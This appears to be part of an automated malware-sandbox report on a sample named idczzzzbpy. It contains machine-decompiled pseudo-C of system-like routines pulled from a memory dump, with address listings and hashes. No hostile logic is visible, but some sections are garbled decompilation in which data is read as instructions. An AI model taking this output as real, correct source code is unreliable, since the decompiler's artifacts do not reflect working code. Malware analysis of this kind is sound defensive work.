                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 885266447-0
                    • Opcode ID: 38696dd86eda2b5952647f0cb3ea0012d23441d4f4d967c47c4d6338eb3a9b51
                    • Instruction ID: 5103ea5a47eaa2c5d585913713879a115a12811bc823d78228cd937234ab9e93
                    • Opcode Fuzzy Hash: 38696dd86eda2b5952647f0cb3ea0012d23441d4f4d967c47c4d6338eb3a9b51
                    • Instruction Fuzzy Hash: D1515A71A08741CFC720EF29C89092AFBE5FB88610F148A6EF99587355D771EC44CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01692581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 83%
                    			E01692581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200421) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t235;
				signed int _t239;
				char* _t242;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				signed int _t256;
				signed int _t263;
				signed int _t266;
				signed int _t274;
				signed int _t276;
				intOrPtr _t281;
				signed int _t283;
				signed int _t285;
				void* _t286;
				signed int _t287;
				unsigned int _t290;
				signed int _t294;
				signed int* _t295;
				signed int _t296;
				signed int _t300;
				intOrPtr _t312;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				signed int _t328;
				signed int _t329;
				void* _t333;
				signed int _t334;
				signed int _t336;
				signed int _t339;
				void* _t340;

				_t336 = _t339;
				_t340 = _t339 - 0x4c;
				_v8 =  *0x175d360 ^ _t336;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t328 = 0x175b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t290 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t281 = 0x48;
				_t310 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t321 = 0;
				_v37 = _t310;
				if(_v48 <= 0) {
					L16:
					_t45 = _t281 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L01684620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t310 = _v32;
							 *((intOrPtr*)(_t328 + 0x3c)) = _t281;
							_t283 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t310;
							if(_t310 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t310 - 0x1758478;
								 *_t328 = ((0 | _t310 == 0x01758478) - 0x00000001 & 0xfffffffb) + 7;
								E016AF3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
								_t310 = _v32;
								_t340 = _t340 + 0xc;
								_t283 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t274 = E016F39F2(_t323);
									_t310 = _v32;
									_t323 = _t274;
								}
							}
							_t294 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t285 = _t328 + _t283 * 4;
								_v56 = _t285;
								do {
									__eflags = _t310;
									if(_t310 != 0) {
										_t235 =  *(_v60 + _t294 * 4);
										__eflags = _t235;
										if(_t235 == 0) {
											goto L30;
										} else {
											__eflags = _t235 == 5;
											if(_t235 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t285 =  *(_v60 + _t294 * 4);
										 *(_t285 + 0x18) = _t323;
										_t239 =  *(_v60 + _t294 * 4);
										__eflags = _t239 - 8;
										if(_t239 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t239 * 4 +  &M01692959))) {
												case 0:
													__ax =  *0x1758488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E016AF3E0(__edi,  *0x175848c, __ax & 0x0000ffff);
														__eax =  *0x1758488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E016AF3E0(_t323, _v80, _v64);
													_t269 = _v64;
													goto L26;
												case 2:
													 *0x1758480 & 0x0000ffff = E016AF3E0(__edi,  *0x1758484,  *0x1758480 & 0x0000ffff);
													__eax =  *0x1758480 & 0x0000ffff;
													__eax = ( *0x1758480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E016AF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E016AF3E0(_t323, _v76, _v36);
														_t269 = _v36;
													}
													L26:
													_t340 = _t340 + 0xc;
													_t323 = _t323 + (_t269 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t271);
													 *((short*)(_t323 - 2)) = _t271;
													goto L28;
												case 6:
													__ebx = "\\WWw\\WWw";
													__eflags = __ebx - "\\WWw\\WWw";
													if(__ebx != "\\WWw\\WWw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E016AF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WWw\\WWw";
														} while (__ebx != "\\WWw\\WWw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1758478 & 0x0000ffff = E016AF3E0(__edi,  *0x175847c,  *0x1758478 & 0x0000ffff);
													__eax =  *0x1758478 & 0x0000ffff;
													__eax = ( *0x1758478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E016F39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1756e58 & 0x0000ffff = E016AF3E0(__edi,  *0x1756e5c,  *0x1756e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1756e58 & 0x0000ffff;
													__eax = ( *0x1756e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t294 = _v16;
													_t310 = _v32;
													L29:
													_t285 = _t285 + 4;
													__eflags = _t285;
													_v56 = _t285;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t294 = _t294 + 1;
									_v16 = _t294;
									__eflags = _t294 - _v48;
								} while (_t294 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t276 =  *(_v60 + _t321 * 4);
						if(_t276 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t276 * 4 +  &M01692935))) {
							case 0:
								__ax =  *0x1758488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t310 =  &_v64;
								_v80 = E01692E3E(0,  &_v64);
								_t281 = _t281 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1758480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1758480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0167EEF0(0x17579a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0167EB70(__ecx, 0x17579a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t213 = _v72;
											__eflags = _t213;
											if(_t213 != 0) {
												L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
											}
											_t214 = _v52;
											__eflags = _t214;
											if(_t214 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
													_t214 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t290 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1757b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0167EB70(__ecx, 0x17579a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t336;
										_pop(_t282);
										return E016AB640(_t214, _t282, _v8 ^ _t336, _t310, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t277 = _v56;
								if(_v56 != 0) {
									_t310 =  &_v36;
									_t279 = E01692E3E(_t277,  &_v36);
									_t290 = _v36;
									_v76 = _t279;
								}
								if(_t290 == 0) {
									goto L44;
								} else {
									_t281 = _t281 + 2 + _t290;
								}
								goto L14;
							case 6:
								__eax =  *0x1755764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1758478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1758478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1756e58 & 0x0000ffff;
								__eax = ( *0x1756e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t310 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t295 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("loopne 0x29");
					_t295[0] = _t295[0] - _t295;
					_t242 = 0x1f016926 +  *_t295 * 0x169262e;
					_pop(_t286);
					asm("insd");
					 *((intOrPtr*)(_t242 +  &_a1530200421)) =  *((intOrPtr*)(_t242 +  &_a1530200421)) + _t310;
					asm("insd");
					 *_t310 =  *_t310 + _t242;
					_t295[0] = _t295[0] - _t336;
					 *_t242 =  *_t242 - 0x69;
					asm("daa");
					_t333 = _t328 + 1 + _t328 + 1 - 1;
					_t295[0] = _t295[0] - _t295;
					asm("daa");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x173ff00);
					E016BD08C(_t286, _t323, _t333);
					_v44 =  *[fs:0x18];
					_t324 = 0;
					 *_a24 = 0;
					_t287 = _a12;
					__eflags = _t287;
					if(_t287 == 0) {
						_t249 = 0xc0000100;
					} else {
						_v8 = 0;
						_t334 = 0xc0000100;
						_v52 = 0xc0000100;
						_t251 = 4;
						while(1) {
							_v40 = _t251;
							__eflags = _t251;
							if(_t251 == 0) {
								break;
							}
							_t300 = _t251 * 0xc;
							_v48 = _t300;
							__eflags = _t287 -  *((intOrPtr*)(_t300 + 0x1641664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t266 = E016AE5C0(_a8,  *((intOrPtr*)(_t300 + 0x1641668)), _t287);
									_t340 = _t340 + 0xc;
									__eflags = _t266;
									if(__eflags == 0) {
										_t334 = E016E51BE(_t287,  *((intOrPtr*)(_v48 + 0x164166c)), _a16, _t324, _t334, __eflags, _a20, _a24);
										_v52 = _t334;
										break;
									} else {
										_t251 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t251 = _t251 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t334;
						__eflags = _t334;
						if(_t334 < 0) {
							__eflags = _t334 - 0xc0000100;
							if(_t334 == 0xc0000100) {
								_t296 = _a4;
								__eflags = _t296;
								if(_t296 != 0) {
									_v36 = _t296;
									__eflags =  *_t296 - _t324;
									if( *_t296 == _t324) {
										_t334 = 0xc0000100;
										goto L76;
									} else {
										_t312 =  *((intOrPtr*)(_v44 + 0x30));
										_t253 =  *((intOrPtr*)(_t312 + 0x10));
										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t296;
										if( *((intOrPtr*)(_t253 + 0x48)) == _t296) {
											__eflags =  *(_t312 + 0x1c);
											if( *(_t312 + 0x1c) == 0) {
												L106:
												_t334 = E01692AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
												_v32 = _t334;
												__eflags = _t334 - 0xc0000100;
												if(_t334 != 0xc0000100) {
													goto L69;
												} else {
													_t324 = 1;
													_t296 = _v36;
													goto L75;
												}
											} else {
												_t256 = E01676600( *(_t312 + 0x1c));
												__eflags = _t256;
												if(_t256 != 0) {
													goto L106;
												} else {
													_t296 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t334 = E01692C50(_t296, _a8, _t287, _a16, _a20, _a24, _t324);
											L76:
											_v32 = _t334;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t334 = _a24;
									_t263 = E01692AE4( &_v36, _a8, _t287, _a16, _a20, _t334);
									_v32 = _t263;
									__eflags = _t263 - 0xc0000100;
									if(_t263 == 0xc0000100) {
										_v32 = E01692C50(_v36, _a8, _t287, _a16, _a20, _t334, 1);
									}
									_v8 = _t324;
									E01692ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t249 = _t334;
					}
					L70:
					return E016BD0D1(_t249);
				}
				L108:
			}





















































                    0x01692584
                    0x01692586
                    0x01692590
                    0x01692596
                    0x01692597
                    0x01692598
                    0x01692599
                    0x0169259e
                    0x016925a4
                    0x016925a9
                    0x016925ac
                    0x016925ae
                    0x016925b1
                    0x016925b2
                    0x016925b5
                    0x016925b8
                    0x016925bb
                    0x016925bc
                    0x016925bf
                    0x016925c2
                    0x016925c5
                    0x016925c6
                    0x016925cb
                    0x016925ce
                    0x016925d8
                    0x016925dd
                    0x016925de
                    0x016925e1
                    0x016925e3
                    0x016925e9
                    0x016926da
                    0x016926da
                    0x016926dd
                    0x016926e2
                    0x016d5b56
                    0x00000000
                    0x016926e8
                    0x016926f9
                    0x016926fb
                    0x016926fe
                    0x01692700
                    0x016d5b60
                    0x00000000
                    0x01692706
                    0x01692706
                    0x0169270a
                    0x0169270a
                    0x0169270d
                    0x01692713
                    0x01692716
                    0x01692718
                    0x0169271c
                    0x0169271e
                    0x016d5b6c
                    0x016d5b6f
                    0x016d5b7f
                    0x016d5b89
                    0x016d5b8e
                    0x016d5b93
                    0x016d5b96
                    0x016d5b9c
                    0x016d5ba0
                    0x016d5ba3
                    0x016d5bab
                    0x016d5bb0
                    0x016d5bb3
                    0x016d5bb3
                    0x016d5ba3
                    0x01692724
                    0x01692726
                    0x01692729
                    0x0169272c
                    0x0169279d
                    0x0169279d
                    0x016927a0
                    0x016927a2
                    0x00000000
                    0x0169272e
                    0x0169272e
                    0x01692731
                    0x01692734
                    0x01692734
                    0x01692736
                    0x016d5bc1
                    0x016d5bc1
                    0x016d5bc4
                    0x00000000
                    0x016d5bca
                    0x016d5bca
                    0x016d5bcd
                    0x00000000
                    0x016d5bd3
                    0x00000000
                    0x016d5bd3
                    0x016d5bcd
                    0x0169273c
                    0x0169273c
                    0x01692742
                    0x01692747
                    0x0169274a
                    0x0169274d
                    0x01692750
                    0x00000000
                    0x01692756
                    0x01692756
                    0x00000000
                    0x01692902
                    0x01692908
                    0x0169290b
                    0x00000000
                    0x01692911
                    0x0169291c
                    0x01692921
                    0x00000000
                    0x01692921
                    0x00000000
                    0x00000000
                    0x01692880
                    0x01692887
                    0x0169288c
                    0x00000000
                    0x00000000
                    0x01692805
                    0x0169280a
                    0x01692814
                    0x01692816
                    0x00000000
                    0x00000000
                    0x0169281e
                    0x01692821
                    0x01692823
                    0x00000000
                    0x01692829
                    0x01692829
                    0x01692831
                    0x0169283c
                    0x0169283e
                    0x00000000
                    0x0169283e
                    0x00000000
                    0x00000000
                    0x0169284e
                    0x01692850
                    0x01692851
                    0x01692854
                    0x01692857
                    0x0169285a
                    0x0169285c
                    0x0169285d
                    0x00000000
                    0x00000000
                    0x0169275d
                    0x01692761
                    0x00000000
                    0x01692767
                    0x0169276e
                    0x01692773
                    0x01692773
                    0x01692776
                    0x01692778
                    0x0169277e
                    0x0169277e
                    0x01692781
                    0x01692781
                    0x01692783
                    0x01692784
                    0x00000000
                    0x00000000
                    0x016d5bd8
                    0x016d5bde
                    0x016d5be4
                    0x016d5be6
                    0x016d5be8
                    0x016d5be9
                    0x016d5bee
                    0x016d5bf8
                    0x016d5bff
                    0x016d5c01
                    0x016d5c04
                    0x016d5c07
                    0x016d5c0b
                    0x016d5c0d
                    0x016d5c0d
                    0x016d5c15
                    0x016d5c18
                    0x016d5c1b
                    0x016d5c1b
                    0x016d5c1e
                    0x00000000
                    0x00000000
                    0x016928c3
                    0x016928c8
                    0x016928d2
                    0x016928d4
                    0x016928d8
                    0x016928db
                    0x016d5c26
                    0x016d5c28
                    0x016d5c2d
                    0x016d5c2d
                    0x00000000
                    0x00000000
                    0x016d5c34
                    0x016d5c36
                    0x016d5c49
                    0x016d5c4e
                    0x016d5c54
                    0x016d5c5b
                    0x016d5c5d
                    0x016d5c60
                    0x01692788
                    0x01692788
                    0x0169278b
                    0x0169278e
                    0x0169278e
                    0x0169278e
                    0x01692791
                    0x00000000
                    0x00000000
                    0x01692756
                    0x01692750
                    0x00000000
                    0x01692794
                    0x01692794
                    0x01692795
                    0x01692798
                    0x01692798
                    0x00000000
                    0x01692734
                    0x0169272c
                    0x01692700
                    0x016925ef
                    0x016925ef
                    0x016925ef
                    0x016925f2
                    0x016925f8
                    0x00000000
                    0x00000000
                    0x016925fe
                    0x00000000
                    0x016928e6
                    0x016928ec
                    0x016928ef
                    0x016928f5
                    0x016928f8
                    0x016928f8
                    0x00000000
                    0x016928f8
                    0x00000000
                    0x00000000
                    0x01692866
                    0x01692866
                    0x01692876
                    0x01692879
                    0x00000000
                    0x00000000
                    0x016927e0
                    0x016927e7
                    0x016927e9
                    0x016927eb
                    0x016d5afd
                    0x00000000
                    0x016d5afd
                    0x00000000
                    0x00000000
                    0x01692633
                    0x01692638
                    0x0169263b
                    0x0169263c
                    0x0169263e
                    0x01692640
                    0x01692642
                    0x01692647
                    0x01692649
                    0x0169264e
                    0x01692650
                    0x01692653
                    0x01692659
                    0x016926a2
                    0x016926a7
                    0x016926ac
                    0x016926b2
                    0x016d5b11
                    0x016d5b15
                    0x016d5b17
                    0x00000000
                    0x016926b8
                    0x016926b8
                    0x016926ba
                    0x016927a6
                    0x016927a6
                    0x016927a9
                    0x016927ab
                    0x016927b9
                    0x016927b9
                    0x016927be
                    0x016927c1
                    0x016927c3
                    0x016927c5
                    0x016927c7
                    0x016d5c74
                    0x016d5c79
                    0x016d5c79
                    0x016927c7
                    0x00000000
                    0x016926c0
                    0x016926c0
                    0x016926c3
                    0x016926c6
                    0x016926c6
                    0x016926c9
                    0x016926c9
                    0x00000000
                    0x016926c9
                    0x016926ba
                    0x0169265b
                    0x0169265b
                    0x0169265e
                    0x01692667
                    0x0169266d
                    0x01692677
                    0x0169267c
                    0x0169267f
                    0x01692681
                    0x016d5b49
                    0x016d5b4e
                    0x016927cd
                    0x016927d0
                    0x016927d1
                    0x016927d2
                    0x016927d4
                    0x016927dd
                    0x01692687
                    0x01692687
                    0x0169268a
                    0x0169268b
                    0x0169268e
                    0x0169268f
                    0x01692691
                    0x01692696
                    0x01692698
                    0x0169269d
                    0x0169269f
                    0x00000000
                    0x0169269f
                    0x01692681
                    0x00000000
                    0x00000000
                    0x01692846
                    0x00000000
                    0x00000000
                    0x01692605
                    0x0169260a
                    0x0169260c
                    0x01692611
                    0x01692616
                    0x01692619
                    0x01692619
                    0x0169261e
                    0x00000000
                    0x01692624
                    0x01692627
                    0x01692627
                    0x00000000
                    0x00000000
                    0x016d5b1f
                    0x00000000
                    0x00000000
                    0x01692894
                    0x0169289b
                    0x0169289d
                    0x016928a1
                    0x016d5b2b
                    0x016d5b2e
                    0x016d5b2e
                    0x016928a7
                    0x016928a9
                    0x016d5b04
                    0x016d5b09
                    0x016d5b09
                    0x016d5b09
                    0x00000000
                    0x00000000
                    0x016d5b35
                    0x016d5b3c
                    0x016928fb
                    0x016928fb
                    0x016926cc
                    0x016926cc
                    0x016926d0
                    0x00000000
                    0x016926d2
                    0x016926d2
                    0x00000000
                    0x016926d2
                    0x00000000
                    0x00000000
                    0x016925fe
                    0x0169292d
                    0x0169292f
                    0x01692930
                    0x01692935
                    0x0169293d
                    0x01692946
                    0x01692949
                    0x0169294e
                    0x0169294f
                    0x01692950
                    0x01692957
                    0x01692958
                    0x0169295a
                    0x0169295d
                    0x01692962
                    0x01692969
                    0x0169296a
                    0x0169296e
                    0x0169297d
                    0x0169297e
                    0x0169297f
                    0x01692980
                    0x01692981
                    0x01692982
                    0x01692983
                    0x01692984
                    0x01692985
                    0x01692986
                    0x01692987
                    0x01692988
                    0x01692989
                    0x0169298a
                    0x0169298b
                    0x0169298c
                    0x0169298d
                    0x0169298e
                    0x0169298f
                    0x01692990
                    0x01692992
                    0x01692997
                    0x016929a3
                    0x016929a6
                    0x016929ab
                    0x016929ad
                    0x016929b0
                    0x016929b2
                    0x016d5c80
                    0x016929b8
                    0x016929b8
                    0x016929bb
                    0x016929c0
                    0x016929c5
                    0x016929c6
                    0x016929c6
                    0x016929c9
                    0x016929cb
                    0x00000000
                    0x00000000
                    0x016929cd
                    0x016929d0
                    0x016929d9
                    0x016929db
                    0x016929dd
                    0x01692a7f
                    0x01692a84
                    0x01692a87
                    0x01692a89
                    0x016d5ca1
                    0x016d5ca3
                    0x00000000
                    0x01692a8f
                    0x01692a8f
                    0x00000000
                    0x01692a8f
                    0x00000000
                    0x016929e3
                    0x016929e3
                    0x016929e3
                    0x00000000
                    0x016929e3
                    0x016929dd
                    0x00000000
                    0x016929db
                    0x016929e6
                    0x016929e9
                    0x016929eb
                    0x016929ed
                    0x016929f3
                    0x016929f5
                    0x016929f8
                    0x016929fa
                    0x01692a97
                    0x01692a9a
                    0x01692a9d
                    0x01692add
                    0x00000000
                    0x01692a9f
                    0x01692aa2
                    0x01692aa5
                    0x01692aa8
                    0x01692aab
                    0x016d5cab
                    0x016d5caf
                    0x016d5cc5
                    0x016d5cda
                    0x016d5cdc
                    0x016d5cdf
                    0x016d5ce5
                    0x00000000
                    0x016d5ceb
                    0x016d5ced
                    0x016d5cee
                    0x00000000
                    0x016d5cee
                    0x016d5cb1
                    0x016d5cb4
                    0x016d5cb9
                    0x016d5cbb
                    0x00000000
                    0x016d5cbd
                    0x016d5cbd
                    0x00000000
                    0x016d5cbd
                    0x016d5cbb
                    0x01692ab1
                    0x01692ab1
                    0x01692ac4
                    0x01692ac6
                    0x01692ac6
                    0x00000000
                    0x01692ac6
                    0x01692aab
                    0x00000000
                    0x01692a00
                    0x01692a09
                    0x01692a0e
                    0x01692a21
                    0x01692a24
                    0x01692a35
                    0x01692a3a
                    0x01692a3d
                    0x01692a42
                    0x01692a59
                    0x01692a59
                    0x01692a5c
                    0x01692a5f
                    0x01692a5f
                    0x016929fa
                    0x016929f3
                    0x01692a64
                    0x01692a64
                    0x01692a6b
                    0x01692a6b
                    0x01692a6d
                    0x01692a72
                    0x01692a72
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: PATH
                    • API String ID: 0-1036084923
                    • Opcode ID: 802454ccfaab2a65ec96a696d208815b4ce01bc004e0a4c1e82e9b6e443ebd23
                    • Instruction ID: dabd1d2d7a9f070fb0f57cef126a97dc5ab30ddd41b99dd6ecd531ba6cac62a2
                    • Opcode Fuzzy Hash: 802454ccfaab2a65ec96a696d208815b4ce01bc004e0a4c1e82e9b6e443ebd23
                    • Instruction Fuzzy Hash: D4C16AB1D00219ABDF25DF99DCA0ABDBBB9FF48710F44402DE901BB250D774A942CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E0169FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0167EEF0(0x1757b60);
					_t134 =  *0x1757b84; // 0x77577b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1757b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1757b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01676D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
